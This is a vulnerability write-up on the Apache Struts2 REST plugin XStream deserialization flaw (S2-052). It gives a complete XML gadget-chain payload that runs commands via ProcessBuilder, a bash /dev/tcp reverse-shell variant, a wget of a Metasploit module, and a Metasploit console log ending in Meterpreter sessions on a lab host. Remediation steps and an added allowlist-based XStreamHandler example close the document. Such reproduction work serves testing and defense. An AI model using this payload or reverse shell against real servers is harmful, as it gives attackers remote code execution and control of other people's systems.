The REST plugin of Apache Struts2 has a high-severity remote code execution vulnerability. The XStream component used by the Struts2 REST plugin has a deserialization flaw: when XStream deserializes an XML request body, the content is not validated effectively, which leaves a security hole that can be attacked remotely. Once Struts2 has the rest-plugin enabled and an XStreamHandler has been written and configured, the result is remote command execution, a serious problem. In practice there are some limitations: certain conditions must be met, and this is not a component that Struts enables by default.
Affected versions:
Version 2.5.0 to 2.5.12
Version 2.3.0 to 2.3.33
Fixed versions:
Struts 2.5.13
Struts 2.3.34
Vulnerability verification:
Download the last affected version, struts-2.5.12, from the Struts2 site: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
Deploy the struts2-rest-showcase.war project. Click Edit and, when the form is submitted, intercept the request.
Change Content-Type: application/xml
Change the POST body to:
<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/system32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>
Note that the JDK version must be 1.8; testing on lower JDK versions does not work.
Spaces inside the POC's command tag must be split into separate string tags.
For example, touch /tmp/xxx
must be written as
<command> <string>touch</string> <string>/tmp/xxx</string> </command>
Actual testing on Linux in a self-built environment (CentOS 6.5, apache-tomcat-8.0.46)
Creating a file works:
<command> <string>touch</string> <string>/tmp/xxx</string> </command>
But with the following POC I could not get a reverse shell (it only makes the outbound connection; no Bash comes back). I am not sure whether this is related to the environment.
<command> <string>bash</string> <string>-c</string> <string>bash -i >& /dev/tcp/x.x.x.x/port 0>&1</string> </command>
Also, if the test does not work, try clearing the work directory under the tomcat directory and running it again.
Getting meterpreter on Linux
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
msfconsole
msf > use exploit/multi/http/struts2_rest_xstream
msf exploit(struts2_rest_xstream) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(struts2_rest_xstream) > set lhost 172.16.100.177
lhost => 172.16.100.177
msf exploit(struts2_rest_xstream) > show options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.100.155                   yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts app
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.100.177   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Apache Struts 2.5 - 2.5.12

msf exploit(struts2_rest_xstream) > exploit

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/tD86RKaLdwV
[*] Local IP: http://172.16.100.177:8080/tD86RKaLdwV
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(struts2_rest_xstream) > exploit

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/CFpeUWr3UO3b7s5
[*] Local IP: http://172.16.100.177:8080/CFpeUWr3UO3b7s5
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /rw7AbVJ4D8RcPFo-BYSmjA9L-dN7OPSB7NnI1R5R97ZHeZ8zC6CFm7WTV9KBp4CWjTHPZ2nnj_9tLmcClEo3QwMO8YXRdG4HGoLfAcOWNx43fBFbD with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.100.177:8443 -> 172.16.100.155:58051) at 2017-09-13 17:32:56 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /hkiZkZ_fW9LcAdoDhbknRgM_qsJFpQYWAWkJT5Qjt8QVFopVe0ypSG-eoVv9eKJp5I_n0ZKxaKy66ZT with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (172.16.100.177:8443 -> 172.16.100.155:53330) at 2017-09-13 17:33:04 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command Stager progress - 100.00% done (122/122 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.16.100.155
OS           : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter  : x64/linux
Remediation suggestions:
1. Officially recommended: restrict the data types handled by the plugin to json (note the quotes must be plain ASCII double quotes in struts.xml)
<constant name="struts.action.extension" value="xhtml,,json" />
2. Upgrade Struts to version 2.5.13 or 2.3.34
3. Perform data validation or checks in the XStreamHandler
Reference articles:
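As an added example of suggestion 3 (not code from this write-up or from the Struts project), the following Java class shows what "data validation in the XStreamHandler" can look like in practice: instead of a denylist of known gadget classes, the XStream instance is configured to forbid every type and then allow only the application's own model classes plus the primitives and collection wrappers it needs, so an XML body naming any other class (for example java.lang.ProcessBuilder) is rejected before it is instantiated. The package name, the Order model, the `isRejected` helper and the sample bodies are constructed for illustration; the no-argument `createXStream()` override is an assumption that holds for the 2.3.x and 2.5.12 plugin, while 2.5.13+ passes an ActionInvocation to that method. It relies on XStream's type-permission API (1.4.7 or later).

```java
// Added example, not the Struts project's own code. Assumes struts2-rest-plugin
// and XStream >= 1.4.7 on the classpath; package and model names are hypothetical.
package example.rest;

import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;
import org.apache.struts2.rest.handler.XStreamHandler;

import java.util.Collection;
import java.util.Map;

public class AllowlistXStreamHandler extends XStreamHandler {

    /** Constructed model class standing in for the application's real REST resources. */
    public static class Order {
        public long id;
        public String clientName;
    }

    /** The only application types this handler will ever instantiate from XML. */
    private static final Class<?>[] ALLOWED_MODELS = { Order.class };

    /** Builds an XStream that denies every type except an explicit allowlist. */
    public static XStream hardenedXStream(Class<?>... allowedModels) {
        XStream xstream = new XStream();
        // NoTypePermission.NONE clears all permissions: nothing is allowed by default.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-allow only what a model document legitimately needs.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class });
        xstream.allowTypeHierarchy(Collection.class);
        xstream.allowTypeHierarchy(Map.class);
        xstream.allowTypes(allowedModels);
        // Friendly element name so clients do not need the fully qualified class name.
        xstream.alias("order", Order.class);
        return xstream;
    }

    /**
     * Override point the plugin calls when it needs an XStream instance.
     * Assumption: no-argument signature (2.3.x / 2.5.12); in 2.5.13+ the
     * method receives an ActionInvocation parameter.
     */
    @Override
    protected XStream createXStream() {
        return hardenedXStream(ALLOWED_MODELS);
    }

    /**
     * Returns true when the body is rejected by the type allowlist. XStream wraps
     * the ForbiddenClassException in a ConversionException for nested elements,
     * so the cause chain is inspected; any other parse error is rethrown.
     */
    public static boolean isRejected(String xmlBody) {
        try {
            hardenedXStream(ALLOWED_MODELS).fromXML(xmlBody);
            return false;
        } catch (XStreamException e) {
            for (Throwable t = e; t != null; t = t.getCause()) {
                if (t instanceof ForbiddenClassException) {
                    return true;
                }
            }
            throw e;
        }
    }

    public static void main(String[] args) {
        // Constructed sample bodies: one legitimate model, one naming a class
        // outside the allowlist (no working gadget chain, just the type name).
        String legitimate = "<order><id>3</id><clientName>Bob</clientName></order>";
        String untrusted = "<map><entry><java.lang.ProcessBuilder/></entry></map>";
        System.out.println("legitimate rejected: " + isRejected(legitimate)); // false
        System.out.println("untrusted rejected:  " + isRejected(untrusted));  // true
    }
}
```

Register the class in struts.xml in place of the default handler (the bean name and the exact `contentTypeHandler` wiring follow the plugin's own documentation for the Struts version in use). The allowlist is the durable part of the fix: the payload in this write-up chains several JDK classes, and a denylist that names only those would be bypassed by the next gadget chain, whereas a deny-all policy forces every new resource type to be added deliberately. Even with this in place, suggestion 2 (upgrading) is still the baseline, and suggestion 1 removes XML handling entirely where the API does not need it.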
http://bobao.360.cn/learning/detail/4372.html
https://github.com/jas502n/St2-052